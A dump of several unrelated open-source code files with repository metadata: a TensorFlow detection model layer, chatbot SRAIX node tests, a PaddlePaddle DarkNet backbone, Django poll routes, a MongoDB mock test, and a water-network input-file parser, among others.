kernel_val = cw[layer_name][0]
bias_val = cw[layer_name][1]
if mc.DEBUG_MODE:
print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape()))
with tf.variable_scope(layer_name) as scope:
input_shape = inputs.get_shape().as_list()
if flatten:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs = tf.reshape(inputs, [-1, dim])
if use_pretrained_param:
try:
# check the size before layout transform
assert kernel_val.shape == (hiddens, dim), \
'kernel shape error at {}'.format(layer_name)
kernel_val = np.reshape(
np.transpose(
np.reshape(
kernel_val, # O x (C*H*W)
(hiddens, input_shape[3], input_shape[1], input_shape[2])
), # O x C x H x W
(2, 3, 1, 0)
), # H x W x C x O
(dim, -1)
) # (H*W*C) x O
# check the size after layout transform
assert kernel_val.shape == (dim, hiddens), \
'kernel shape error at {}'.format(layer_name)
except:
# Do not use pretrained parameter if shape doesn't match
use_pretrained_param = False
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
else:
dim = input_shape[1]
if use_pretrained_param:
try:
kernel_val = np.transpose(kernel_val, (1,0))
assert kernel_val.shape == (dim, hiddens), \
'kernel shape error at {}'.format(layer_name)
except:
use_pretrained_param = False
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
if use_pretrained_param:
if mc.DEBUG_MODE:
print ('Using pretrained model for {}'.format(layer_name))
kernel_init = tf.constant(kernel_val, dtype=tf.float32)
bias_init = tf.constant(bias_val, dtype=tf.float32)
elif xavier:
kernel_init = tf.contrib.layers.xavier_initializer()
bias_init = tf.constant_initializer(0.0)
else:
kernel_init = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
bias_init = tf.constant_initializer(0.0)
weights = _variable_with_weight_decay(
'weights', shape=[dim, hiddens], wd=mc.WEIGHT_DECAY,
initializer=kernel_init)
biases = _variable_on_device('biases', [hiddens], bias_init)
self.model_params += [weights, biases]
outputs = tf.nn.bias_add(tf.matmul(inputs, weights), biases)
if relu:
outputs = tf.nn.relu(outputs, 'relu')
# count layer stats
self.model_size_counter.append((layer_name, (dim+1)*hiddens))
      num_flops = 2 * dim * hiddens + hiddens
if relu:
num_flops += 2*hiddens
self.flop_counter.append((layer_name, num_flops))
self.activation_counter.append((layer_name, hiddens))
return outputs
def filter_prediction(self, boxes, probs, cls_idx):
"""Filter bounding box predictions with probability threshold and
non-maximum supression.
Args:
boxes: array of [cx, cy, w, h].
probs: array of probabilities
cls_idx: array of class indices
Returns:
final_boxes: array of filtered bounding boxes.
final_probs: array of filtered probabilities
final_cls_idx: array of filtered class indices
"""
mc = self.mc
if mc.TOP_N_DETECTION < len(probs) and mc.TOP_N_DETECTION > 0:
order = probs.argsort()[:-mc.TOP_N_DETECTION-1:-1]
probs = probs[order]
boxes = boxes[order]
cls_idx = cls_idx[order]
else:
filtered_idx = np.nonzero(probs>mc.PROB_THRESH)[0]
probs = probs[filtered_idx]
boxes = boxes[filtered_idx]
cls_idx = cls_idx[filtered_idx]
final_boxes = []
final_probs = []
final_cls_idx = []
for c in range(mc.CLASSES):
idx_per_class = [i for i in range(len(probs)) if cls_idx[i] == c]
keep = util.nms(boxes[idx_per_class], probs[idx_per_class], mc.NMS_THRESH)
for i in range(len(keep)):
if keep[i]:
final_boxes.append(boxes[idx_per_class[i]])
final_probs.append(probs[idx_per_class[i]])
final_cls_idx.append(c)
return final_boxes, final_probs, final_cls_idx
def _activation_summary(self, x, layer_name):
"""Helper to create summaries for activations.
Args:
x: layer output tensor
layer_name: name of the layer
Returns:
nothing
"""
with tf.variable_scope('activation_summary') as scope:
tf.summary.histogram(
'activation_summary/'+layer_name, x)
tf.summary.scalar(
'activation_summary/'+layer_name+'/sparsity', tf.nn.zero_fraction(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/average', tf.reduce_mean(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/max', tf.reduce_max(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/min', tf.reduce_min(x))
| 37.009537 | 86 | 0.632726 |
b2cfd67059757453f3efd232290f4dbff7a288f5 | 4,637 | py | Python | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 2 | 2018-06-16T09:32:22.000Z | 2019-07-21T13:16:00.000Z | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 3 | 2020-07-16T04:00:42.000Z | 2021-03-31T18:52:22.000Z | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 4 | 2018-06-29T23:50:44.000Z | 2020-11-05T08:13:47.000Z | import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.sraix import TemplateSRAIXNode
from programy.parser.template.nodes.word import TemplateWordNode
from programy.services.service import Service, ServiceFactory
from programy.config.brain.brain import BrainConfiguration
from programy.config.brain.service import BrainServiceConfiguration
from programytest.parser.base import ParserTestsBaseClass
class MockService(Service):
def __init__(self, config):
Service.__init__(self, config)
def ask_question(self, context: str, question: str):
return "asked"
class MockTemplateSRAIXNode(TemplateSRAIXNode):
def __init__(self):
TemplateSRAIXNode.__init__(self)
def resolve_to_string(self, context):
raise Exception("This is an error")
class TemplateSRAIXNodeTests(ParserTestsBaseClass):
def test_node_unsupported_attributes(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
node.host = "http://somebot.org"
node.botid = "1234567890"
node.hint = "The usual"
node.apikey = "ABCDEF"
node.service = "api"
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX (service=api)", node.to_string())
def test_node_service(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
node.service = "api"
self.assertEqual("api", node.service)
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX (service=api)", node.to_string())
def test_node_no_service(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX ()", node.to_string())
def test_to_xml_service(self):
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "api"
root.append(node)
node.append(TemplateWordNode("Hello"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><sraix service="api">Hello</sraix></template>', xml_str)
def test_to_xml_no_service(self):
root = TemplateNode()
node = TemplateSRAIXNode()
root.append(node)
node.append(TemplateWordNode("Hello"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><sraix>Hello</sraix></template>', xml_str)
def test_call_service(self):
service_config = BrainServiceConfiguration("mock")
service_config._classname = 'programytest.services.test_service.MockService'
brain_config = BrainConfiguration()
brain_config.services._services['mock'] = service_config
ServiceFactory.preload_services(brain_config.services)
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "mock"
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("asked", node.resolve(self._client_context))
def test_call_no_service_exists(self):
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "mock"
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("", node.resolve(self._client_context))
def test_call_no_service_defined(self):
root = TemplateNode()
node = TemplateSRAIXNode()
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("", node.resolve(self._client_context))
def test_node_exception_handling(self):
root = TemplateNode()
node = MockTemplateSRAIXNode()
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEquals("", result) | 30.30719 | 92 | 0.665516 |
61bcadfbacc9c80eacf0c436a591c67f484a5da4 | 11,105 | py | Python | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 3,655 | 2020-03-28T09:19:50.000Z | 2022-03-31T13:28:39.000Z | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 829 | 2020-03-28T04:03:18.000Z | 2022-03-31T14:34:30.000Z | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 738 | 2020-03-28T03:56:46.000Z | 2022-03-31T13:11:03.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlex.ppdet.core.workspace import register, serializable
from paddlex.ppdet.modeling.ops import batch_norm, mish
from ..shape_spec import ShapeSpec
__all__ = ['DarkNet', 'ConvBNLayer']
class ConvBNLayer(nn.Layer):
def __init__(self,
ch_in,
ch_out,
filter_size=3,
stride=1,
groups=1,
padding=0,
norm_type='bn',
norm_decay=0.,
act="leaky",
freeze_norm=False,
data_format='NCHW',
name=''):
"""
conv + bn + activation layer
Args:
ch_in (int): input channel
ch_out (int): output channel
filter_size (int): filter size, default 3
stride (int): stride, default 1
groups (int): number of groups of conv layer, default 1
padding (int): padding size, default 0
norm_type (str): batch norm type, default bn
            norm_decay (float): decay for weight and bias of batch norm layer, default 0.
act (str): activation function type, default 'leaky', which means leaky_relu
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(ConvBNLayer, self).__init__()
self.conv = nn.Conv2D(
in_channels=ch_in,
out_channels=ch_out,
kernel_size=filter_size,
stride=stride,
padding=padding,
groups=groups,
data_format=data_format,
bias_attr=False)
self.batch_norm = batch_norm(
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.act = act
def forward(self, inputs):
out = self.conv(inputs)
out = self.batch_norm(out)
if self.act == 'leaky':
out = F.leaky_relu(out, 0.1)
elif self.act == 'mish':
out = mish(out)
return out
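# A minimal shape sketch for the layer above (illustrative sizes, defined but
# never called): a 3x3 conv with stride 1 and padding 1 keeps the spatial size,
# so only the channel count changes.
def _conv_bn_layer_shape_sketch():
    layer = ConvBNLayer(ch_in=3, ch_out=32, filter_size=3, stride=1, padding=1)
    out = layer(paddle.rand([2, 3, 64, 64]))  # NCHW input
    assert list(out.shape) == [2, 32, 64, 64]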
class DownSample(nn.Layer):
def __init__(self,
ch_in,
ch_out,
filter_size=3,
stride=2,
padding=1,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
downsample layer
Args:
ch_in (int): input channel
ch_out (int): output channel
filter_size (int): filter size, default 3
stride (int): stride, default 2
padding (int): padding size, default 1
norm_type (str): batch norm type, default bn
            norm_decay (float): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(DownSample, self).__init__()
self.conv_bn_layer = ConvBNLayer(
ch_in=ch_in,
ch_out=ch_out,
filter_size=filter_size,
stride=stride,
padding=padding,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.ch_out = ch_out
def forward(self, inputs):
out = self.conv_bn_layer(inputs)
return out
class BasicBlock(nn.Layer):
def __init__(self,
ch_in,
ch_out,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
BasicBlock layer of DarkNet
Args:
ch_in (int): input channel
ch_out (int): output channel
norm_type (str): batch norm type, default bn
            norm_decay (float): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(BasicBlock, self).__init__()
self.conv1 = ConvBNLayer(
ch_in=ch_in,
ch_out=ch_out,
filter_size=1,
stride=1,
padding=0,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.conv2 = ConvBNLayer(
ch_in=ch_out,
ch_out=ch_out * 2,
filter_size=3,
stride=1,
padding=1,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
def forward(self, inputs):
conv1 = self.conv1(inputs)
conv2 = self.conv2(conv1)
out = paddle.add(x=inputs, y=conv2)
return out
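# Shape note for BasicBlock (illustrative sizes): conv1 is a 1x1 conv down to
# ch_out channels and conv2 a 3x3 conv back up to ch_out * 2, so the residual
# add only works when ch_in == 2 * ch_out, e.g. BasicBlock(64, 32) maps an
# NCHW tensor [N, 64, H, W] to [N, 64, H, W].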
class Blocks(nn.Layer):
def __init__(self,
ch_in,
ch_out,
count,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
name=None,
data_format='NCHW'):
"""
        Blocks layer, which consists of several BasicBlock layers
Args:
ch_in (int): input channel
ch_out (int): output channel
count (int): number of BasicBlock layer
norm_type (str): batch norm type, default bn
            norm_decay (float): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
name (str): layer name
data_format (str): data format, NCHW or NHWC
"""
super(Blocks, self).__init__()
self.basicblock0 = BasicBlock(
ch_in,
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.res_out_list = []
for i in range(1, count):
block_name = '{}.{}'.format(name, i)
res_out = self.add_sublayer(
block_name,
BasicBlock(
ch_out * 2,
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format))
self.res_out_list.append(res_out)
self.ch_out = ch_out
def forward(self, inputs):
y = self.basicblock0(inputs)
for basic_block_i in self.res_out_list:
y = basic_block_i(y)
return y
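# Per-stage BasicBlock counts for DarkNet-53: stage i repeats its residual
# block DarkNet_cfg[53][i] times (1, 2, 8, 8 and 4 blocks respectively).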
DarkNet_cfg = {53: ([1, 2, 8, 8, 4])}
@register
@serializable
class DarkNet(nn.Layer):
__shared__ = ['norm_type', 'data_format']
def __init__(self,
depth=53,
freeze_at=-1,
return_idx=[2, 3, 4],
num_stages=5,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
Darknet, see https://pjreddie.com/darknet/yolo/
Args:
depth (int): depth of network
freeze_at (int): freeze the backbone at which stage
            num_stages (int): number of stages used from DarkNet_cfg, default 5
return_idx (list): index of stages whose feature maps are returned
norm_type (str): batch norm type, default bn
            norm_decay (float): decay for weight and bias of batch norm layer, default 0.
data_format (str): data format, NCHW or NHWC
"""
super(DarkNet, self).__init__()
self.depth = depth
self.freeze_at = freeze_at
self.return_idx = return_idx
self.num_stages = num_stages
self.stages = DarkNet_cfg[self.depth][0:num_stages]
self.conv0 = ConvBNLayer(
ch_in=3,
ch_out=32,
filter_size=3,
stride=1,
padding=1,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.downsample0 = DownSample(
ch_in=32,
ch_out=32 * 2,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self._out_channels = []
self.darknet_conv_block_list = []
self.downsample_list = []
ch_in = [64, 128, 256, 512, 1024]
for i, stage in enumerate(self.stages):
name = 'stage.{}'.format(i)
conv_block = self.add_sublayer(
name,
Blocks(
int(ch_in[i]),
32 * (2**i),
stage,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format,
name=name))
self.darknet_conv_block_list.append(conv_block)
if i in return_idx:
self._out_channels.append(64 * (2**i))
for i in range(num_stages - 1):
down_name = 'stage.{}.downsample'.format(i)
downsample = self.add_sublayer(
down_name,
DownSample(
ch_in=32 * (2**(i + 1)),
ch_out=32 * (2**(i + 2)),
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format))
self.downsample_list.append(downsample)
def forward(self, inputs):
x = inputs['image']
out = self.conv0(x)
out = self.downsample0(out)
blocks = []
for i, conv_block_i in enumerate(self.darknet_conv_block_list):
out = conv_block_i(out)
if i == self.freeze_at:
out.stop_gradient = True
if i in self.return_idx:
blocks.append(out)
if i < self.num_stages - 1:
out = self.downsample_list[i](out)
return blocks
@property
def out_shape(self):
return [ShapeSpec(channels=c) for c in self._out_channels]
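# Channel sketch for the defaults above: each returned stage i contributes
# 64 * 2**i channels, so with return_idx=[2, 3, 4] out_shape reports feature
# maps of 256, 512 and 1024 channels.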
| 32.565982 | 88 | 0.533093 |
c060c08d639cb61ab85b481e8967a95e1313a62c | 2,945 | py | Python | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | import subprocess
import sys
class module_test:
def __init__(self, module_char, input_file, output_file, expected_file):
self.m = module_char
self.i = input_file
self.o = output_file
self.e = expected_file
subprocess.call('make',shell=True)
spur_test = module_test('S',
'test_files/spur_input.txt',
'spur_output.txt',
'test_files/spur_expected.txt')
rack_test = module_test('R',
'test_files/rack_input.txt',
'rack_output.txt',
'test_files/rack_expected.txt')
metric_test = module_test('U',
'test_files/metric_input.txt',
'metric_output.txt',
'test_files/metric_expected.txt')
spur_wrong_format = module_test('S',
'test_files/spur_wrong_format.txt',
'spur_output.txt',
'test_files/wrong_expected.txt')
spur_wrong_vals = module_test('S',
'test_files/spur_wrong_vals.txt',
'spur_output.txt',
'test_files/wrong_expected.txt')
rack_wrong_format = module_test('R',
'test_files/rack_wrong_format.txt',
'rack_output.txt',
'test_files/wrong_expected.txt')
rack_wrong_vals = module_test('R',
'test_files/rack_wrong_vals.txt',
'rack_output.txt',
'test_files/wrong_expected.txt')
metric_wrong_format = module_test('U',
'test_files/metric_wrong_format.txt',
'metric_output.txt',
'test_files/wrong_expected.txt')
metric_wrong_vals = module_test('U',
'test_files/metric_wrong_vals.txt',
'metric_output.txt',
'test_files/wrong_expected.txt')
tests=[spur_test,rack_test,metric_test] # correct functioning
tests += [spur_wrong_format,
spur_wrong_vals,
rack_wrong_format,
rack_wrong_vals,
metric_wrong_format,
metric_wrong_vals] # stress test
for i in range(0,len(tests)):
bash_test=' '.join(['bash -x system_test.sh',
tests[i].m,
tests[i].i,
tests[i].o,
tests[i].e,
'> test_'+str(i)+'.txt'])
subprocess.call(bash_test,shell=True)
if 'Test failed' in open('test_'+str(i)+'.txt').read():
sys.exit()
print('rm test_'+str(i)+'.txt')
subprocess.call('rm test_'+str(i)+'.txt',shell=True)
subprocess.call('make clean',shell=True)
| 36.8125 | 76 | 0.49983 |
16a420497cbc2838885d99cdb809ed834438bdec | 261 | py | Python | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 3 | 2015-06-24T10:59:28.000Z | 2017-09-10T16:49:09.000Z | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 2 | 2020-04-20T21:06:33.000Z | 2020-05-06T10:15:31.000Z | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 1 | 2016-12-02T10:12:42.000Z | 2016-12-02T10:12:42.000Z | from typing import List
from pydantic import BaseModel
class UserBase(BaseModel):
email: str
name: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
is_active: bool
class Config:
orm_mode = True
| 12.428571 | 30 | 0.67433 |
8ea7b92be0bbf63a79053f5f71804d03461f2518 | 253 | py | Python | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | from .main import stack_frame_analyzer
class Parent:
@property
def context(self):
return stack_frame_analyzer.get_caller_context(1)
@classmethod
def _get_context(cls):
return stack_frame_analyzer.get_caller_context(1)
| 21.083333 | 57 | 0.735178 |
77c1866a018a430988f7df5152dcc6fe41e4f03c | 737 | py | Python | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='home'),
path('polls/', views.index, name='index'),
# ex: /polls/5/
path('<int:question_id>/', views.detail, name='detail'),
# ex: /polls/5/results/
path('<int:question_id>/results/', views.results, name='results'),
# ex: /polls/5/vote/
path('<int:question_id>/vote/', views.vote, name='vote'),
path('delta/', views.delta, name='default'),
path('home/', views.home, name='default'),
path('compute/', views.compute, name='default'),
path('storage/', views.storage, name='default'),
path('data/', views.data, name='default'),
path('info/', views.info, name='default'),
] | 36.85 | 71 | 0.601085 |
2f02503f54270021b825b963770248475b992bf6 | 2,025 | py | Python | test/mockupdb/test_rsghost.py | infinite-skx/mongo-python-driver | bdafc357331813222b1e677b66041dad1fc852a5 | [
"Apache-2.0"
] | null | null | null | test/mockupdb/test_rsghost.py | infinite-skx/mongo-python-driver | bdafc357331813222b1e677b66041dad1fc852a5 | [
"Apache-2.0"
] | 1 | 2021-12-24T11:32:17.000Z | 2021-12-24T11:32:17.000Z | test/mockupdb/test_rsghost.py | Surfndez/mongo-python-driver | 51691246e9b2ef8446f3716c9ba7bab1a9f4e1ad | [
"Apache-2.0"
] | null | null | null | # Copyright 2021-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test connections to RSGhost nodes."""
import datetime
from mockupdb import going, MockupDB
from pymongo import MongoClient
from pymongo.errors import ServerSelectionTimeoutError
import unittest
class TestRSGhost(unittest.TestCase):
def test_rsghost(self):
rsother_response = {
'ok': 1.0, 'ismaster': False, 'secondary': False,
'info': 'Does not have a valid replica set config',
'isreplicaset': True, 'maxBsonObjectSize': 16777216,
'maxMessageSizeBytes': 48000000, 'maxWriteBatchSize': 100000,
'localTime': datetime.datetime(2021, 11, 30, 0, 53, 4, 99000),
'logicalSessionTimeoutMinutes': 30, 'connectionId': 3,
'minWireVersion': 0, 'maxWireVersion': 15, 'readOnly': False}
server = MockupDB(auto_ismaster=rsother_response)
server.run()
self.addCleanup(server.stop)
# Default auto discovery yields a server selection timeout.
with MongoClient(server.uri, serverSelectionTimeoutMS=250) as client:
with self.assertRaises(ServerSelectionTimeoutError):
client.test.command('ping')
# Direct connection succeeds.
with MongoClient(server.uri, directConnection=True) as client:
with going(client.test.command, 'ping'):
request = server.receives(ping=1)
request.reply()
if __name__ == '__main__':
unittest.main()
| 38.207547 | 77 | 0.687901 |
f6e37d74fe9d7940c17297dc80908a58c165981c | 8,605 | py | Python | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | null | null | null | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | null | null | null | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | 2 | 2021-06-22T20:16:08.000Z | 2021-06-22T20:21:03.000Z | import sys
import pandas as pd
import wntr
from antlr4 import *
from dhalsim.parser.antlr.controlsLexer import controlsLexer
from dhalsim.parser.antlr.controlsParser import controlsParser
class Error(Exception):
"""Base class for exceptions in this module."""
class NoInpFileGiven(Error):
"""Raised when tag you are looking for does not exist"""
class NotEnoughInitialValues(Error):
"""Raised when there are not enough initial values in a csv"""
def value_to_status(actuator_value):
"""
    Translates an actuator's integer value into its status string.
    :param actuator_value: The value from the status.value of the actuator
    :type actuator_value: int
    :return: "closed" if the value is 0, "open" otherwise
"""
if actuator_value == 0:
return "closed"
else:
return "open"
class InputParser:
"""
Class handling the parsing of .inp input files.
:param intermediate_yaml: The intermediate yaml file
"""
def __init__(self, intermediate_yaml):
"""Constructor method"""
self.data = intermediate_yaml
for plc in self.data['plcs']:
if 'sensors' not in plc:
plc['sensors'] = list()
if 'actuators' not in plc:
plc['actuators'] = list()
# Get the INP file path
if 'inp_file' in self.data.keys():
self.inp_file_path = self.data['inp_file']
else:
raise NoInpFileGiven()
# Read the inp file with WNTR
self.wn = wntr.network.WaterNetworkModel(self.inp_file_path)
self.batch_mode = 'batch_simulations' in self.data
def write(self):
"""
Writes all needed inp file sections into the intermediate_yaml.
"""
# Generate PLC controls
self.generate_controls()
# Generate list of actuators + initial values
self.generate_actuators_list()
# Generate list of times
self.generate_times()
# Generate initial values if batch mode is true
if 'initial_tank_data' in self.data:
self.generate_initial_tank_values()
# Generate network loss values if network loss is true
if 'network_loss_data' in self.data:
self.generate_network_losses()
# Generate network delay values if network delay is true
if 'network_delay_data' in self.data:
self.generate_network_delays()
# Add iterations if not existing
if "iterations" not in self.data.keys():
iterations = int(self.data["time"][0]["duration"] / self.data["time"][1]["hydraulic_timestep"])
if iterations <= 0:
print(f"Error in inp file section [TIMES]: (duration: {self.data['time'][0]['duration']} / "
f"hydraultic timestep: {self.data['time'][1]['hydraulic_timestep']}) = {iterations}")
sys.exit(1)
self.data["iterations"] = iterations
# Return the YAML object
return self.data
def generate_controls(self):
"""
        Generates the list of controls with their types, values, actuators and,
        where applicable, the node they depend on; then adds them to self.data to be written to the yaml.
"""
input_file = FileStream(self.inp_file_path)
tree = controlsParser(CommonTokenStream(controlsLexer(input_file))).controls()
controls = []
for i in range(0, tree.getChildCount()):
child = tree.getChild(i)
# Get all common control values from the control
actuator = str(child.getChild(1))
action = str(child.getChild(2))
if child.getChildCount() == 8:
# This is an AT NODE control
dependant = str(child.getChild(5))
value = float(str(child.getChild(7)))
controls.append({
"type": str(child.getChild(6)).lower(),
"dependant": dependant,
"value": value,
"actuator": actuator,
"action": action.lower()
})
if child.getChildCount() == 6:
# This is a TIME control
value = float(str(child.getChild(5)))
controls.append({
"type": "time",
"value": int(value),
"actuator": actuator,
"action": action.lower()
})
for plc in self.data['plcs']:
plc['controls'] = []
actuators = plc['actuators']
for control in controls:
if control['actuator'] in actuators:
plc['controls'].append(control)
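    # Sketch of the mapping above for two illustrative [CONTROLS] lines:
    #   "LINK P1 OPEN IF NODE T1 BELOW 2.0"  (8 tokens) becomes
    #       {'type': 'below', 'dependant': 'T1', 'value': 2.0,
    #        'actuator': 'P1', 'action': 'open'}
    #   "LINK P1 CLOSED AT TIME 5"           (6 tokens) becomes
    #       {'type': 'time', 'value': 5, 'actuator': 'P1', 'action': 'closed'}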
def generate_times(self):
"""
Generates duration and hydraulic timestep and adds to the
data to be written to the yaml file.
"""
# TODO Decide on the timestep (minutes or seconds?)
times = [
{"duration": self.wn.options.time.duration},
{"hydraulic_timestep": self.wn.options.time.hydraulic_timestep}
]
self.data['time'] = times
def generate_actuators_list(self):
"""
Generates list of actuators with their initial states
and adds to the data to be written to the yaml file.
"""
pumps = []
for pump in self.wn.pumps():
pumps.append({
"name": pump[0],
"initial_state": value_to_status(pump[1].status.value)
})
valves = []
for valve in self.wn.valves():
valves.append({
"name": valve[0],
"initial_state": value_to_status(valve[1].status.value)
})
# Append valves to pumps
pumps.extend(valves)
self.data['actuators'] = pumps
def generate_initial_tank_values(self):
"""Generates all tanks with their initial values if running in batch mode"""
initial_values = {}
initial_tank_levels = pd.read_csv(self.data['initial_tank_data'])
self.verify_csv_input(initial_tank_levels, 'initial_tank_data')
# For all columns in csv
for index in range(len(initial_tank_levels.columns)):
name = initial_tank_levels.columns[index]
# Insert tank value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
initial_values[str(name)] = \
float(initial_tank_levels.iloc[data_index, index])
self.data['initial_tank_values'] = initial_values
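    # Expected csv layout (illustrative tank names and levels): one column per
    # tank and one row per simulation, with the row picked by batch_index
    # (row 0 when not running in batch mode), e.g.
    #   T1,T2
    #   3.0,1.2
    #   4.5,0.8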
def generate_network_losses(self):
